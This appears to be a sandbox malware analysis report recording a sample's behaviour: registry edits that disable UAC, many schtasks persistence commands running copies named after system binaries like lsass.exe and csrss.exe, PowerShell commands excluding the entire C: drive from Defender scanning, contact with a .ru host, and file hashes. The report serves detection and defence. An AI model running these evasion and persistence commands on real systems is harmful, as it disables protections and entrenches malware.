PID 3712 wrote to memory of 4768 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3712 wrote to memory of 4768 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3712 wrote to memory of 4004 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe
PID 3712 wrote to memory of 4004 N/A C:\Users\All Users\Start Menu\dwm.exe C:\Windows\System32\WScript.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\All Users\Start Menu\dwm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\All Users\Start Menu\dwm.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\TextInputHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Users\Default User\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Defender\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Defender\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\setup\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Windows\es-ES\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\es-ES\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Windows\es-ES\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Windows\ShellExperiences\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\ShellExperiences\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Windows\ShellExperiences\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Photo Viewer\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Photo Viewer\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files\dotnet\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\dotnet\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Program Files\dotnet\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Desktop\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Public\Desktop\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Desktop\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Start Menu\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Start Menu\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\Adobe\sihost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Adobe\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Common Files\Adobe\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Windows\Downloaded Program Files\StartMenuExperienceHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\StartMenuExperienceHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Windows\Downloaded Program Files\StartMenuExperienceHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\Music\TextInputHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Users\Admin\Music\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Music\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Users\All Users\Start Menu\dwm.exe

"C:\Users\All Users\Start Menu\dwm.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ab7e06f9-2cc8-4039-a499-49e52af85ad2.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\eda212e0-b707-4135-b3ca-d394da60635d.vbs"

C:\Users\All Users\Start Menu\dwm.exe

"C:\Users\All Users\Start Menu\dwm.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\81c5646d-102c-46e0-92fd-129b90595df8.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\35541dda-7271-4b45-900f-b19f5a04cf83.vbs"

C:\Users\All Users\Start Menu\dwm.exe

"C:\Users\All Users\Start Menu\dwm.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e6fc0a39-883a-46ff-a6d3-d13ba2e70843.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d351468d-da31-44c7-b7e8-b5ac0aa20c65.vbs"

C:\Users\All Users\Start Menu\dwm.exe

"C:\Users\All Users\Start Menu\dwm.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b745de3f-71bb-43d1-b5ee-dbf9a731a082.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6fd181d3-d663-466c-8a85-35734ecdd0bb.vbs"

C:\Users\All Users\Start Menu\dwm.exe

"C:\Users\All Users\Start Menu\dwm.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\963ae9cf-215a-4c39-9f8a-a4cbef438161.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6740a6cb-9ad3-4f11-9b0c-c00dfa9ff0d3.vbs"

C:\Users\All Users\Start Menu\dwm.exe

"C:\Users\All Users\Start Menu\dwm.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b32fa960-2f85-4070-ba3e-49aa4a739b40.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\811ad167-1cf8-4192-bfe4-82bbbbc5e7d3.vbs"

C:\Users\All Users\Start Menu\dwm.exe

"C:\Users\All Users\Start Menu\dwm.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\91ca450c-7cd1-4794-aa05-82bfcf12046a.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fcdffa1d-bcbd-4b73-8a64-cced2c4b1fe6.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 a0887556.xsph.ru udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
US 8.8.8.8:53 42.197.8.141.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 3.166.122.92.in-addr.arpa udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
RU 141.8.197.42:80 a0887556.xsph.ru tcp
RU 141.8.197.42:80 a0887556.xsph.ru tcp

Files

memory/228-0-0x00007FFAE60C3000-0x00007FFAE60C5000-memory.dmp

memory/228-1-0x0000000000380000-0x00000000006BC000-memory.dmp

memory/228-2-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp

memory/228-3-0x0000000000F90000-0x0000000000F9E000-memory.dmp

memory/228-4-0x0000000002860000-0x000000000286E000-memory.dmp

memory/228-5-0x000000001BA60000-0x000000001BA68000-memory.dmp

memory/228-6-0x000000001BA70000-0x000000001BA8C000-memory.dmp

memory/228-8-0x000000001BA90000-0x000000001BA98000-memory.dmp

memory/228-9-0x000000001BAA0000-0x000000001BAB0000-memory.dmp

memory/228-7-0x000000001BAE0000-0x000000001BB30000-memory.dmp

memory/228-10-0x000000001BAB0000-0x000000001BAC6000-memory.dmp

memory/228-12-0x000000001BB30000-0x000000001BB40000-memory.dmp

memory/228-11-0x000000001BAD0000-0x000000001BAD8000-memory.dmp

memory/228-13-0x000000001BB40000-0x000000001BB4A000-memory.dmp

memory/228-14-0x000000001BB50000-0x000000001BBA6000-memory.dmp

memory/228-15-0x000000001BBA0000-0x000000001BBAC000-memory.dmp

memory/228-16-0x000000001BBB0000-0x000000001BBB8000-memory.dmp

memory/228-17-0x000000001BBC0000-0x000000001BBCC000-memory.dmp

memory/228-18-0x000000001BBD0000-0x000000001BBD8000-memory.dmp

memory/228-19-0x000000001BBE0000-0x000000001BBF2000-memory.dmp

memory/228-20-0x000000001C140000-0x000000001C668000-memory.dmp

memory/228-22-0x000000001BC20000-0x000000001BC2C000-memory.dmp

memory/228-21-0x000000001BC10000-0x000000001BC1C000-memory.dmp

memory/228-23-0x000000001BC30000-0x000000001BC3C000-memory.dmp

memory/228-24-0x000000001B150000-0x000000001B15C000-memory.dmp

memory/228-25-0x000000001BE80000-0x000000001BE88000-memory.dmp

memory/228-30-0x000000001BE50000-0x000000001BE5C000-memory.dmp

memory/228-29-0x000000001BE40000-0x000000001BE4E000-memory.dmp

memory/228-28-0x000000001B180000-0x000000001B188000-memory.dmp

memory/228-27-0x000000001B170000-0x000000001B17E000-memory.dmp

memory/228-26-0x000000001B160000-0x000000001B16A000-memory.dmp

memory/228-31-0x000000001BE60000-0x000000001BE68000-memory.dmp

memory/228-32-0x000000001BE70000-0x000000001BE7A000-memory.dmp

memory/228-34-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp

memory/228-33-0x000000001BED0000-0x000000001BEDC000-memory.dmp

memory/228-37-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp

memory/228-38-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp

C:\Windows\es-ES\fontdrvhost.exe

MD5 1553f67a0859a3057cde01f77db9dbc0
SHA1 2cfe40d1fea16093e16c96a35f3240b98da9a5e1
SHA256 a9ac10090fed177df3867fc88eda57dd852c595dde10953b7b798523e1043152
SHA512 4ff68e4ad4299aa2ca2be8dfd1742d641cf9aee6b687f94b1e3c68062630b2e167a13550a8a184c8ff5a3df1da5b3182ebd29759a84a219af37a8688df6f0de5

C:\Windows\es-ES\fontdrvhost.exe

MD5 b1377edb5c7395d31186330b4fd7d765
SHA1 b62990a719b9d21207199b75289bdf33b538698e
SHA256 9298f57897b97818653f7924436abb4830f7d44845eb0206dd4cc09878940752
SHA512 ec727ed321f020368a39e036eb244a247b4e6ae0ecaead1f40b9d514da72db7c7ef6db09c3b455c1234eff0adb6d5232e1af7e0eb3a76823319455d2420efcc3

C:\Recovery\WindowsRE\explorer.exe

MD5 084a5938ce77b9383a43d5379c773a31
SHA1 34b37f96202f81e8a34421020421290f0d1d61ff
SHA256 e493068c68472f3fbaf14f1d126c4861805f5e1cbf1356279ca283ca72177b9d
SHA512 f52ea959e51b7a7df7f7be23578c1b201ea1e4e7b9fdd9227a3883c03e9aa0ff7e2b4d2ae160255f794c840e116d93a1fcfd7c12b37b013f837d087ee9151bae

C:\Program Files (x86)\Windows Photo Viewer\wininit.exe

MD5 a3a56880e371bb4b5ff3f4e28791b5a5
SHA1 ccfe35536a1b3c8c5f73bd14dce0c44b19ba34ce
SHA256 2591daab5ada3d5417b33d7ba183edd7b29ee6b71bcb8617427d9d45f317357c
SHA512 4b4527e62a9ae19fc12fc5307ad5767bb1bb5216dc9dff07e56a801d3a0ae7c3235f68e6d60d7055698d07dc3a9c6496d6ad1bb9ff7a09dfbb2682211be17c70

C:\Program Files\dotnet\RCX716D.tmp

MD5 3d1fc8efc678bfb40a5f49845c25a3cb
SHA1 256a956945e7e21ae94980e02a68a367c27d6134
SHA256 1e17e7d23ffbbe052329b2938d5dace678d66ee4e1c2c2677534806bc728b056
SHA512 fc2e8df616e30c2c118b8932c6f4df7986ea808bfe7d913171aacf1f3a63f3e27ae859dda061e78b83102be866ce48ad8f473ede10d4e3714be7fd05badfaa7c

C:\ProgramData\Microsoft\Windows\Start Menu\dwm.exe

MD5 b0c249b693a72c5ff1a062672062d7e3
SHA1 e33a8e952d7f4c47248f3e14f7f21f7b9f404d9b
SHA256 6d4eb0464a83df85cc2658a6ddf86dde7ee67b59b07040d30b826b9ab93fde8d
SHA512 e3ec6b3a1380dfada3e6ccaaa2f94ba1206a048d6be7efcba5504e8625826e0ed607e02f13a29668ae1d6615cddd9a7ba2c7ad2392cc871a414843db3dabafeb

C:\Windows\Downloaded Program Files\StartMenuExperienceHost.exe

MD5 89f6cd1f773d3a1ead6be3afb295c88d
SHA1 ba44492cc4ca4a7b9299929f51ced2c1a8e63dc9
SHA256 ac2240e7b5af0107e910c06c8d1335cc3b81473f038e99e813f9adb63349d7c1
SHA512 7fe1399398abfa5cb58caf07001957951ac7f5db8fe2129d8e0d617066955b5608f962569604607ae9279f145a71deca4de72dd617b4ad79b2223c58c139169b

C:\Users\Admin\Music\TextInputHost.exe

MD5 630af483ee3b5912b48f536e87e36bbe
SHA1 9c41f8263dfa41bc59bcfdc94c4b8a9fe9b501f5
SHA256 c9d2dfbe883bc0e8e928b007ffbcbad20be8184f864cbf042dfd654b5531be18
SHA512 7ecb991bc5e12136aea5fc5502b9b5f46cfc4828d45fb435f95c63abb2e3a77c9a86c34a3007bc3b90a7749a58dca8813ae49b74ccb2bd5a2797bd00e6c6b6a0

C:\Recovery\WindowsRE\RuntimeBroker.exe

MD5 be05449cab989bfd4746a79de768ea0a
SHA1 b9a6621f50cf0bd585018234cbd88dfd08b6a4da
SHA256 bf6e2194e5eb468002440144ea8ad581afae778463d67cc6867172e292fc1747
SHA512 1016d56e8df32853b0de263b09bce6320e1819cf107404d3c7aecee6f811647685bc075b2a3b5881f5454b7e39d2e57bda1056ad4c2b235c3d5d72bfa2b9a1ce

memory/3372-336-0x00000288C7A80000-0x00000288C7AA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2blqgxt4.u1e.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4684-447-0x0000000000F60000-0x000000000129C000-memory.dmp

memory/228-448-0x00007FFAE60C0000-0x00007FFAE6B81000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 59d97011e091004eaffb9816aa0b9abd
SHA1 1602a56b01dd4b7c577ca27d3117e4bcc1aa657b
SHA256 18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
SHA512 d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

